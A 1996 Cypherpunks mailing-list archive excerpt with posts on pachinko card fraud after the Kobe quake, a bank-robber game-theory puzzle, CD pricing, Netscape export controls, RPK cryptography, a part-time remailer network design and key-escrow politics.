>>   promoting Japanese pachinko cards to halt the surreptitious
>>   funneling of betting cash to the construction of a North
>>   Korean nuclear plant. 

The Central Intelligence Agency told the Japanese government that Pachinko
parlors (many run by ethnic Koreans) were sending hard currency to North
Korea which was assisting it in building a plant to produce fissionable
materials.  The Japanese decided to strong arm Pachinko parlors into using
magnetic cards instead of cash to discourage money laundering.  

>>   And the op's nuking by the Kobe quake
>>   looting of card-reading mechanisms, cracking encryption
>>   codes, and counterfeiting not-so-smart cards for counter-
>>   tipping the house fix. Mondex, watcher bleedin arse.

During the Kobe earthquake recovery, a number of Pachinko machines were
stolen, reverse engineered, and fake cards produced.  They were then cashed
in -- causing massive losses to the issuers.  The encryption technology was
very weak.  Mondex watch out that the same thing doesn't happen to you.

DCF

"I've been translating engineers into English for years.  John's no problem."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Fri, 26 Jul 1996 11:38:22 +0800
To: "'Multiple recipients of list WIN95-L'" <cypherpunks@toad.com>
Subject: Apps: Unix for Windows 95
Message-ID: <01BB7ABB.D2E64540@Jerome Tan>
MIME-Version: 1.0
Content-Type: text/plain


I want to play with Unix or at least be familiar with Unix. Unfortunately, Unix systems are expensive, if possible, is there any software that can be run in Windows 95 that makes you run Unix in your system?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@galaxy.galstar.com (Igor Chudov)
Date: Fri, 26 Jul 1996 01:52:47 +0800
To: cypherpunks@toad.com
Subject: Twenty Bank Robbers -- Game theory:)
Message-ID: <199607251409.JAA16978@galaxy.galstar.com>
MIME-Version: 1.0
Content-Type: text


Here's a puzzle for our game theorists.

Twenty cypherpunks robbed a bank. They took 20 million bucks. Here's
how they plan to split the money: they stay in line, and the first guy
suggests how to split the money. Then they vote on his suggestion. If
50% or more vote for his proposal, his suggestion is adopted.

Otherwise they kill the  first robber and now it is the turn of guy #2
to make another splitting proposal. Same voting rules apply.

The question is, what will be the outcome? How will they split the
money, how many robbers will be dead, and so on?

igor




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 26 Jul 1996 01:43:06 +0800
To: jamesd@echeque.com (James A. Donald)
Subject: Re: Game Theory and its Relevance to Cypherpunks
In-Reply-To: <199607250636.XAA06174@dns2.noc.best.net>
Message-ID: <199607251413.JAA07901@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


James A. Donald wrote:
> The best way to convince others you are crazy is to actually be crazy.
> 
> More practically, if you organize your nuclear forces so that any 
> serious war is likely to escalate uncontrollably into the battle of 
> armageddon, regardless of your intentions and desires, which is how 
> the American government organized its nuclear forces in Europe, 
> then you can pretty much guarantee you will not have to face a 
> serious war.

How did they organize them? It is interesting.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com (Paul J. Bell)
Date: Fri, 26 Jul 1996 00:01:42 +0800
To: cypherpunks@toad.com
Subject: Re: A Global Village; an open letter to Bill & Hill and also Mr. & Mrs. Dole, from Asim at Molecule One. Cypherpunks, please excuse this note.
Message-ID: <9607251316.AA01741@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


really relevent to this list, way to go asim. what if we all choose to clutter
this list with our own little hot buttons? 
	-paul

> From cypherpunks-errors@toad.com Wed Jul 24 18:20:55 1996
> X-Sender: molecul1@molecule1.com
> X-Mailer: Windows Eudora Version 1.4.3b4
> Mime-Version: 1.0
> Content-Type> : > text/plain> ; > charset="us-ascii"> 
> Date: Wed, 24 Jul 1996 00:48:32 -0700
> To: cypherpunks@toad.com
> From: molecul1@molecule1.com (Molecule One Scientific Research Institute)
> Subject: A Global Village; an open letter to Bill & Hill and also Mr. & Mrs. Dole, from Asim at Molecule One. Cypherpunks, please excuse this note.
> Cc: molecul1@molecule1.com
> Sender: owner-cypherpunks@toad.com
> Content-Length: 4562
> 
> Honourable wishes,
> 
>  I write about Mrs. Clinton's concept of Global Village and wholeheartedly,
> pledge my support to such an important concept.
>  
>  The world is everchanging and Mrs. Clinton is correct in that the
> industrialized
> countries have lost, most, of their extended families. This makes children
> vulnerable to danger. If in need of help, such children are commonly abused
> due to their vulnerability.
> 
>  I want to take this moment to express some understandings. Firstly, it
> was never in my plan to locate where I have been over the last while.
> Probably, if it hadn't been for many malicious encounters, I probably
> would of gone to a remote island, as I hold so dear to my heart. A
> close friend was severly violated and I had to witness a war being
> fought against civillians. When an insurance policy becomes more
> valuable than the human life, something must be wrong with social
> ethics.
> 
>  To live through many of the experiences I had to, while living here,
> made me realize high technology is dangerous in many peoples
> lives. To manipulate peoples decisions using brute force seemed
> terribly wrong to me. Many of the people controlling the situations
> are also stressed out. Abuse results from stress.
> 
>   Concerning the old man. I knew of this man since childhood. I
> always considered him one of the greatest neuroscientists
> on the planet earth. Even his friends hold him with  a greatest
> respect. What he accomplished, very few could  match his
> accomplishments.
> 
>   I send much thanks to Point Communications for allowing me
> a long interview about my social concerns. I wanted to personally
> thank all the K12 students that partook in my interview. I was
> never able to attend the requests of some of those students,
> that asked me to review some of their essays, as my time
> was occupied with endless other obstacles. I want those
> students to understand that I just couldn't.
> 
>   I want to thank all those cool students that let me participate
> at their, private, dance parties. They know I attended endless
> dance parties, researching technological requirements,
> so they are happy and socially satisfied. I also got to
> know what kind of social threats they are faced with, both,
> underground and official. Stress does tend to corrupt some 
> people.
> 
>   I want you to understand that I came up with Molecule One
> as a means to address the needs of a culture. Even though
> many plots were directed at me for proposing this project,
> I always knew I spoke the truth and my intentions were
> pure. Neurosciences has always been a lifelong inspiration
> to me. Standards, to improve the quality of life in society,
> seemed a noble goal.
> 
>  I want the students to know that Molecule One was 
> created for their benefit first. They are the future. When
> a child remains innocent, that innocence should be
> protected. Far too often, children loose their innocence
> to hardend people, who's primary motive is malicious
> intent. Naivete and innocence is purity and lack of
> ethical standard is rampent.
> 
>  I knew that acceptance of truth is difficult for
> some people, especially those ignorant and those
> conditioned to believe otherwise. I always chose
> positive as an outcome for motive.
> 
>  I want to thank all of you, Republican, Democrat,
> and families, friends and which other political
> inspiration. I respect all life and those standards that
> can increase the health standard of all people. There
> are many important factors that must be considered
> to insure a safe and healthy society, of the
> future. To work together, to attain this standard,
> is important for all people, irregardless of color.
> Care and courtesy, toward our fellow people,
> is another  social characteristic that is becoming
> lost, with the loss of the extended family.
> 
>  I also want to thank all those cool computer folk
> that let me play upon the info  highway, as it was
> being developed. I want to thank all those
> cyberfolk that recognised the import of all
> topics covered. Understand well, visions of
> tropical islands have floated through my mind,
> probably, everyday I've been here. It  was
> my concern for the youth and for the elderly
> that made me stay and attempt to create
> a project that could bring happiness and
> harmony, to the society, for a long time to
> come. It is a challenge.
> 
>   Thanks for the cyber inspiration, acknowledgement
> and being allowed the opportunity to create a 
> work of art that can benefit so many.
> 
>   To the 1'st family & 2  Mr.& Mrs. Dole, all friends and families.
> 
>   Peace and best wishes,
>                           Sincerely,
> 
>                                   Asim
> molecul1@molecule1.com
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 26 Jul 1996 02:59:56 +0800
To: "Bill Olson (EDP)" <a-billol@microsoft.com>
Subject: RE: Noise: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <c=US%a=_%p=msft%l=RED-16-MSG-960724234146Z-40061@tide19.microsoft.com>
Message-ID: <Pine.LNX.3.93.960725095053.691B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Jul 1996, Bill Olson (EDP) wrote:
> Alan Horowitz writes:
> >Phil,
> >are you saying that you're a better businessman than Rush Limbaugh?
> >Can we see some 1040's, please?
> 	
> Rush Limbagh is a big fat *RICH* idiot.

     Big? yes. 
     Fat? I'd say so.
     Rich? In relation to me, yes, and probably to you.

     Idiot? The man _got_ rich doing something he enjoys and is good at,
meanwhile you are working for the great satan. Who is the Idiot?

     OB Crypto: From what I have heard Mr. Limbaugh _didn't_ like the CDA,
and if the right person can get to him and convince him properly, he might
even come out against GAK (if he hasn't already). He has the potential to 
reach millions of _very_ loyal people. It might be worth someones time to 
try to get thru to him.


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 26 Jul 1996 05:01:48 +0800
To: cypherpunks@toad.com
Subject: Re: Twenty Bank Robbers -- Game theory:)
Message-ID: <199607251702.KAA06172@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:09 AM 7/25/96 -0500, Igor Chudov wrote:
>Here's a puzzle for our game theorists.
>
>Twenty cypherpunks robbed a bank. They took 20 million bucks. Here's
>how they plan to split the money: they stay in line, and the first guy
>suggests how to split the money. Then they vote on his suggestion. If
>50% or more vote for his proposal, his suggestion is adopted.
>
>Otherwise they kill the  first robber and now it is the turn of guy #2
>to make another splitting proposal. Same voting rules apply.
>
>The question is, what will be the outcome? How will they split the
>money, how many robbers will be dead, and so on?


My guess?  They all agree to kill whoever made that suicidal rule.  
Otherwise, all but two would end up dead.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Cobb <stephen@iu.net>
Date: Fri, 26 Jul 1996 01:13:36 +0800
To: cypherpunks@toad.com
Subject: RPK Public Key Cryptography
Message-ID: <1.5.4.32.19960725140222.00f90270@iu.net>
MIME-Version: 1.0
Content-Type: text/plain


New algorithm from outside US, new crypto challenge?

My apologies to the list if this subject is old hat but someone just pointed
me to the RPK Public Key Cryptography site and I was wondering what people
thought of this particular technology.

The RPK Public Key Cryptography site at http://crypto.swdev.co.nz/ says:
Have a look at this  new approach to information privacy, designed and
developed in New Zealand. The RPK public key cryptosystem provides
industrial-strength public key cryptography that's available worldwide.
You'll find full technical information, free evaluation software and
development tools, and details of our
SafeCracker Challenge program where you can earn a $$$ REWARD $$$ while
trying to put us out of business!

The inventor and developer of the RPK system is aparently Dr. William
M.Raike who holds a US patent as co-inventor of scrambler which NSA banned
in the US. The Nicolai/Raike case attracted some media attention and, after
the NSA rescinded the order, it was one of the first instances in which an
NSA director commented publicly on patent secrecy issues. That invention had
its roots in spread spectrum technology. Note sure if that has any bearing
on the public key offering.

Note that I have no connection with this person, software or site, just
natural curiousity about what cypherpunks think about it.

Stephen Cobb, CISSP





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 26 Jul 1996 03:08:53 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: Noise: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <9607241624.AA06524@Etna.ai.mit.edu>
Message-ID: <Pine.LNX.3.93.960725100134.691D-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Jul 1996 hallam@Etna.ai.mit.edu wrote:
> 
> >Talk shows that attempt to stimulate active thought on reasonable premise 
> >generally do not survive long in syndication. With Limbaugh's show, it 
> >took a double hit as the markets it played to were for the most part late night. 
> >BTW, this comes from actually looking it up in past TV Guides - not 
> >mindlessly drooling over the radio - so put away the "he's lying" crap.
> And why did the networks put Rush on so late? Could it be that
> he did not pull in the viewers?

     Not the networks, the local stations. Each station decides where to 
slot a specific non-network show. 

     In many time slots he was competing sucessfully with The Late Show, and 
The Other Idiot (sorry, it has been a long time since I watched TV, so I 
can't remember the other idiots name). 

     In one city he was place opposite Oprah Winfrey, and _still_ had decent
ratings, but the TV stations got a lot more complaints about him at 3 in the
afternoon, so they put him on after midnight.

> >Following the shallow logic of your argument, Limbaugh is not a success 
> >because he does not broadcast on TV. 
> 
> It is shallow logic, but it is Rush's own logic. He promotes the
> idea that success is measured in ecconomic terms. The failure of his
> TV show demonstrates the failure of his ideas under the criteria 
> which he himself espouses.

     His TV show did not suceed or fail because of what Limbaugh did, but 
rather on decesions that were totally out of his hands. That is why he
is not renewing his contracts. 

> >If you firmly believe the premise that Fascism was the root cause behind 
> >OKC, then you have no choice but to look to the White House and Capital 
> >Hill. 
> 
> Nope, I look to the millitas, Chritian Identity, the Klu Klux Klan 
> and their appologists including Liddy and Limbaugh. If you read
> the propaganda that the NAZIs used you will find it if anything 
> less direct than Liddy or Buchannan. The NAZIs did not advertise their
> intention to commit mass murder, they used code words. When Buchannan
> refers to "Hose" he is using a codeword he knows will be understood.

     Please do not lump all militias in with the Chistian Identity & Klan 
types, you just display more and more ignorance. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 26 Jul 1996 05:05:38 +0800
To: Adam Shostack <frissell@panix.com (Duncan Frissell)
Subject: Re: Digital Watermarks (long, getting off-topic)
Message-ID: <199607251719.KAA07105@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:27 AM 7/25/96 -0500, Adam Shostack wrote:
>Duncan Frissell wrote:
>| At 10:26 AM 7/24/96 -0800, jim bell wrote:
>| 
>| >Isn't it odd that when music is sold, CD's are MORE expensive than cassette 
>| >tapes, even though you _know_ that the manufacturing cost of CD's is less?
>| 
>| CDs sell for more because buyers decided that they wanted a wider range of
>| titles with shallower sales (hence higher unit costs) rather than a narrower
>| range of titles with lower sales prices.  The number of CD titles available
>| is far greater (in general distribution) than the number of vinyl titles
>| that were available during vinyl's peak year.  This greater availability of
>| short run pressings raises average unit sales costs justifying the higher
>| prices.  Had the market decided (when physical production costs fell) that
>| it was satisfied with a Top-40 CD stock, average CD prices would have fallen
>| to vinyl levels.
>
>	Thus, my desire to listen to the Drummers of Burundi justifies
>a cost of $16.99 for the latest REM album?  If I want the wide range
>of African music thats now available (and I do), then I should be
>willing to pay a premium to get it.  No reason for Alanis Morisette
>fans to subsidise those of us with musical taste.

If what Duncan said were true, then you'd see music stores spring up which 
sell ONLY the "Top-40 stock", but sell it for pre-CD vinyl prices.  They'd 
get all that business, and OTHER record stores would sell the obscure stuff. 
 That's not happening.  

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 26 Jul 1996 03:17:28 +0800
To: pjn@nworks.com
Subject: RE: [Noise] was Re: Givin
In-Reply-To: <TCPSMTP.16.7.25.4.17.0.2645935021.656029@.nworks.com>
Message-ID: <Pine.LNX.3.93.960725102054.691E-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jul 1996 pjn@nworks.com wrote:

>  In> I guess I don't really have to worry too much, though. It is illegal
>  In> for children to possess such items publicly, and any parent who
>  In> condones it is simply breaking the law. I don't blame the child, I
>  In> blame the moronic parent who let's it happen.
> 
>      You would be suprised at what kids can get away with without their
>      parents knowing...


     I doubt that most of us here would be suprised. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Fri, 26 Jul 1996 01:54:24 +0800
To: cypherpunks@toad.com
Subject: Schelling Points, Rights, and Game Theory--Part II
Message-ID: <9606258383.AA838315815@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net wrote:
>I believe the game-theoretic and evolutionary approaches, mixed in with
>economics, offer the most solid grounding for the discussion of rights.

I'll try keep my response brief, because I seem to swerve between didactic and
sarcastic without being able to stop in between. As others have said, look where
I'm pointing, not at what I'm pointing with. So here goes...

Basically, in this view of rights and raising of children it would seem that a
relativistic pragmatism prevails. Personally, I think that the two choices are
either this relative pragmatism or an absolute morality.

"Do unto others as you would have them do unto you." 

Some implications of Tim's view is that all our rights are basically a
transitory agreement between individuals. If at any time the "cost" of a right
becomes too high for too many (e.g. free speech leading to X for some X), then
it is quite possible that this "right" will be removed. The "losers" have no
higher appeal process in this matter than that of trying to gain a different
consensus.

This may work while there is not a large power gap between any two individuals
or groups, but as power shifts to fewer people and groups (economic, social,
political, etc...) the "losers" may find that the lowest cost path is into some
form of economic serfdom or slavery (e.g. McJobs). Ask Phil for other examples
;-).

Unlike Rawls, we are not in a position of developing our laws in advance of
determining our social standing. I personally believe that our ability to
develop reasonable laws and social structures will persist only as long as the
majority of us have the ability to "put ourselves in someone else's shoes" and
do in practical terms what Rawls suggests in theoretical ones.

As soon as those with power are not able to see a situation where they could
become like those without power, there will cease to be motivation to maintain a
"safety net" of rights or economic means to protect the "losers" of our society.

James





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 26 Jul 1996 01:43:22 +0800
To: jsw@netscape.com
Subject: Re: Netscape
In-Reply-To: <31F73E84.415A@netscape.com>
Message-ID: <199607251435.KAA20861@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
>   The simple fact is that our executives decided not to provide
> our US software for download over the internet until we got
> a written statement from the Office of Defense Trade Controls
> that we would not be prosecuted for such actions.  This decision
> was made by our executives based on advice given them by lawyers
> that they trust.  The requirements imposed by the government
> were to get this written statement.  

Would people quit harassing Netscape?

I don't like many things that Netscape does (SSL instead of SHTTP,
etc., private HTML extensions, etc) but they are at least providing
decent security, and by my lights they are under no moral obligation
to martyr themselves.

There is no moral obligation to sacrifice ones self for others. If
they choose not to break the law so that they can continue to do their
work and not go to jail, that is their choice. We have no cause to
harass them for failing to put up their own cross. Indeed, some people
here seem to want them not just to build the cross but nail themselves
to it. Thats asking a bit much by my wa of thinking.

Leave 'em alone. I'm happy that I can now transfer web pages over 128
bit RC4. I'd prefer to have the pages themselves protected and signed
a la SHTTP, but thats a subtle technical consideration. Their hearts
are in the right place.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 26 Jul 1996 05:46:24 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: LIMBAUGH ON TV
In-Reply-To: <9607251646.AA07787@Etna.ai.mit.edu>
Message-ID: <Pine.SUN.3.91.960725103020.4428A-100000@crl4.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punk,

On Thu, 25 Jul 1996 hallam@Etna.ai.mit.edu weasled:
> 
> I'm still rather amused by the terms of your bet, $50 vs 25L.
> At current exchange rates 25 Lire is more like 2 cents.

That's L25, not 25L.  I though Phil was a UK "subject," thus
I proposed a wager of 25 Pounds Sterling.  Clear enough?

If Phil wants to do it all in US dollars then I will bet US$50
against his US$45.  

> Given that this is a public newsgroup, and the one most
> likely to be read by spooks and the FBI I would have to be 
> almost as stupid as Rush to accept any bets on it. Its called
> illegal interstate gambling.

Yes, I know how it is when the mayors of cities with major league
ball clubs in the World Series make public wagers on the outcome 
of the game--hard time in Levenworth.

If Phil really believes he and I are at any credible legal risk 
for a making such a personal wager, he is a fool.  If he really
knows better (my best guess), then he is intellectually dishonest 
and a moral coward.

I again invite Phil to put up or shut up.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alex F" <alexf@iss.net>
Date: Fri, 26 Jul 1996 02:14:58 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Digital Watermarks (long, getting off-topic)
Message-ID: <199607251447.KAA02494@phoenix.iss.net>
MIME-Version: 1.0
Content-Type: text/plain



> >>Isn't it odd that when music is sold, CD's are MORE expensive than cassette 
> >>tapes, even though you _know_ that the manufacturing cost of CD's is less?
> >
> >CDs sell for more because buyers decided that they wanted a wider range of
> >titles with shallower sales (hence higher unit costs) rather than a narrower

> I'm afraid that quantitatively, this is utter nonsense.  
> 
> A relevant data point is the fact that for about $1000, anybody can have 
> 1000 copies of a custom CDROM manufactured.  That, by music industry 
The real; answer to all of these points is too simple.  

"Because they can"

A lot has to do with percieved value.  If consumers would have 
thought that the prices were way too high, then the market would have 
dictated a lower cost eventually.  I think that the price of CDs vs 
tapes is more a marketing issue than a technical one....

Alex F
=-=-=-=-=-=-=-=-=-=-=-=-=-
Alex F    alexf@iss.net
Marketing Specialist
Internet Security Systems
=-=-=-=-=-=-=-=-=-=-=-=-=-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alex F" <alexf@iss.net>
Date: Fri, 26 Jul 1996 02:57:39 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Digital Watermarks for copy protection in recent Billbo
Message-ID: <199607251458.KAA02604@phoenix.iss.net>
MIME-Version: 1.0
Content-Type: text/plain



> >> To go to trial, an indictment would be needed. How likely is this?
> >
> >The likelyness is irrelevant to the point.  Possibility is relevant.
> >Probability is not.
> 
> "Likeliness" is _always_ relevent when discussing law.

I disagree.  The CDA is not likely to ever get enforced.  Does this 
mean that we should just ignore it because likeliness is zero to 
none?


> Thus, the guy who buys a bicycle that later turns out to have been stolen,
> will usually lose the bicycle, but is not knowingly receiving stolen
> property and hence is guilty of no crime. And no DA will charge him; the
> courts and jails are already clogged up enough.

Uhh, if the DA has a personal vendetta against the guy w/ the bike he 
*COULD* charge him, if he wanted to, and it would be 100% legal.  
What we are talking about here are laws that allow for harrassment 
under the guise of the legal system.  Granted, laws are not 
necedssarily bad, people are, but still....

This stuff CAN and DOES (there goes the "likeliness" theory) happen 
all the time.

Your point of view strikes as one from a text book where people are 
not crooked (nothing wrong w/ that), but the sad fact is that there 
are people out there who can and will take advantage of any legal 
loophole in order to get done what they want done.

Alex F

> I maintain that this "wiggle factor" in the law is not something to get
> worried about ("But they _could_ arrest me for buying a book stolen 10
> years ago! We've got to do something!) and is, in fact, essential in any
> justice system. There just is no "automated" or "formal" system, and
> probably/hopefully never will be.
> 
> --Tim May
> 
> 
> 
> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Licensed Ontologist         | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 
=-=-=-=-=-=-=-=-=-=-=-=-=-
Alex F    alexf@iss.net
Marketing Specialist
Internet Security Systems
=-=-=-=-=-=-=-=-=-=-=-=-=-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Fri, 26 Jul 1996 02:16:06 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Parsing John Youn (Re: OPS_nuk)
In-Reply-To: <2.2.32.19960725122659.0069a64c@panix.com>
Message-ID: <31F7BA04.1F382C42@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell wrote:
> 
> Tim asked for a translation.  I thought it was one of John's more
> declarative summaries.  It this case, it's reality that's skewed.  Voila:
> 
> >At 3:30 PM 7/24/96, John Young wrote:
> >>   The WSJ Page Ones a loser's game
> 
> There is an article on the first page of the Wall Street Journal about
> financial losses...

[Rest of decryption elided]

   Bravo! Duncan, your dcryptanalytic skills demonstrate you to be a
truly worthy cypherpunk.

   There isn't any chance you'd be willing to do this on a regular
basis, is there?

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sam Quigley <poodge@econ.Berkeley.EDU>
Date: Fri, 26 Jul 1996 06:29:43 +0800
To: cypherpunks@toad.com
Subject: remailer network/winsock remailers
Message-ID: <Pine.SUN.3.91.960725110229.10878A-100000@quesnay.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

I've been unsubscribed from the list for a while, and only recently 
rejopined, so this issue may well have been addressed in my absence.  If 
not, though, here:

It occurs to me that, with the invention of the winsock remailers, we 
have the potential to establish a very widespread and distributed network 
of part-time remailers.  Specifically, it seems like there are a lot of 
users who are only connected to the internet for short periods (PPP/SLIP) 
or who only have full control over their machines for short periods.  
These computers could not normally be used to run remailers as mail 
would bounce when the computer/remailer software is down.

If there were some sort of central registry where winsock (or other 
non-permanent) remailers could announce their ability/inability to bounce 
mail, email could be forwarded through these temporary remailers on a 
dynamic basis.

I imagine the system would be something like this.  User X, a part-time 
cypherpunk, turns on his PPP connection to get his internet fix.  When he 
does, his remailer software connects to a central site and registers 
itself, the software (and capabilities of the software) it's using, and 
how many email messages (CPU time) X is willing to give up.  The registry 
sends back a confirmation message, and adds X's computer to its list.  
Now, when user Y wants to use the remailer network, she sends a message 
through a series of remailers, one of which is the remailer network host 
computer.  When the message gets to the host computer, the host looks at 
its list and bounces the message randomly to one of the winsock 
remailers.  In this way, people who can't ordinarily run a remailer can 
still help out with the network, and the message becomes, ultimately, 
much more untraceable because (ideally) there are tons of temporary 
remailers that the message could have been sent to.  This could expand 
the network by a lot...

I imagine precautions would have to be taken to ensure that temp. 
remailers really are up and running (the host would have to ping remailer 
computers regularly to ensure that none went down without informing the 
host).  It would also be good if incoming messages to the host remailer 
could specify how many hops it should take, whether or not it should be 
subject to random delays / burst sends, and other options which haven't 
occurred to me yet.

This can't be a new idea, though.  If something like this already exists, 
please send me a pointer.  If not, I'd be willing to help develop a 
protocol for client / server interaction.

-sq





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Fri, 26 Jul 1996 06:21:19 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Twenty Bank Robbers -- Game theory:)
In-Reply-To: <199607251409.JAA16978@galaxy.galstar.com>
Message-ID: <v03007800ae1d6b7e4141@[207.67.246.99]>
MIME-Version: 1.0
Content-Type: text/plain


>Here's a puzzle for our game theorists.
>
>Twenty cypherpunks robbed a bank. They took 20 million bucks. Here's
>how they plan to split the money: they stay in line, and the first guy
>suggests how to split the money. Then they vote on his suggestion. If
>50% or more vote for his proposal, his suggestion is adopted.
>
>Otherwise they kill the  first robber and now it is the turn of guy #2
>to make another splitting proposal. Same voting rules apply.
>
>The question is, what will be the outcome? How will they split the
>money, how many robbers will be dead, and so on?
>
It seems to me that the last two guys in line will _almost always_ vote for killing the suggestor.

the exceptions being for extreme suggestions like "let's split the money between #19 and #20", which I figure will get voted down by #s 2 thru 18.

-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"We're not gonna take it/Never did and never will
We're not gonna take it/Gonna break it, gonna shake it,
let's forget it better still" -- The Who, "Tommy"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 26 Jul 1996 06:48:15 +0800
To: cypherpunks@toad.com
Subject: [Rant] Re: One of the biggest problems with freedom
Message-ID: <2.2.32.19960725183409.00d4a930@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:23 AM 7/25/96 -0700, anonymous-remailer@shell.portal.com wrote:

>Example:  "I don't care if the government has my keys
>for encryption.  I don't do anything wrong, and if it
>helps FBI enforce our just laws, I am all for it.  Since
>anyone who tries to get keys without legal means will end
>up in Leavenworth for the rest of their life, there is
>no problems with people getting access to those things."

<rant>
I usually ask people like this why they would wind up in Levenworth for the
rest of their life?  Or spend any time in jail at all?  Government agents
are frequently found going through the records of friends and enemies.
haven ANY of them gone to jail?  Sometimes one or two will get a repremand
of caught doing something real dirty.  There seem to be few, if any,
penalties for Government Agents caught with their hands in the cookie jar.
(Unless it involves cash.)

Like the police, Government officials tend to protect their own.  If they
start to open your encrypted mail, how do you know?  It is not like the
postal service doing it where you can see the ripped up envolopes.

Ask them if they would mind postal inspectors going through all of their
private letters and postal mail.  (Just to make sure you are not talking
about anything you shouldn't...)  Or maybe watching you when you shower to
make sure that you do not have any underage children in their with you.
There are lots of excuses to be made for intruding into people's lives.
Does not mean it is right.

suggestion for the truely insane/bored: If you really want to start driving
the point home, start intercepting their mail.  Steam the envalopes open,
read it, seal it back up and put in back.  Mention small details of their
private correspondence in passing. Mention that they have still not paid
that bill for Soap Opera Digest. Talk about all the money they own Uncle
Bob.  They will soon get the point.  <<DISCLAIMER: Do not try this at home!
Private citizens cannot get away with this, only "Governments".>>

People do not seem to think about these restrictions until they REALLY start
to affect them.  By then it is too late.  It will "never happen to them"!
(You also might want to point out that not all people accused are actually
guilty.  Some of the worst cases are shown to be fedrales operating off of
old or bad data.  The innocent citizen just happens to get caught in the
path of the Fedreral Juggernaught.

Most of the "average citizens" who I have met who are willing to give up
their freedom are far too clueless and trusting to get the point.  The
Government is there to help them.  (Help themselves to their money, their
property, their personal information, their piece of mind, etc. etc. etc.)
</rant>
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: benchmaster@benchin.com (Benchmaster)
Date: Fri, 26 Jul 1996 05:01:01 +0800
To: cypherpunks@toad.com (Random Nerd)
Subject: Benchin' Registration
Message-ID: <19960725164130921.AAA160@www>
MIME-Version: 1.0
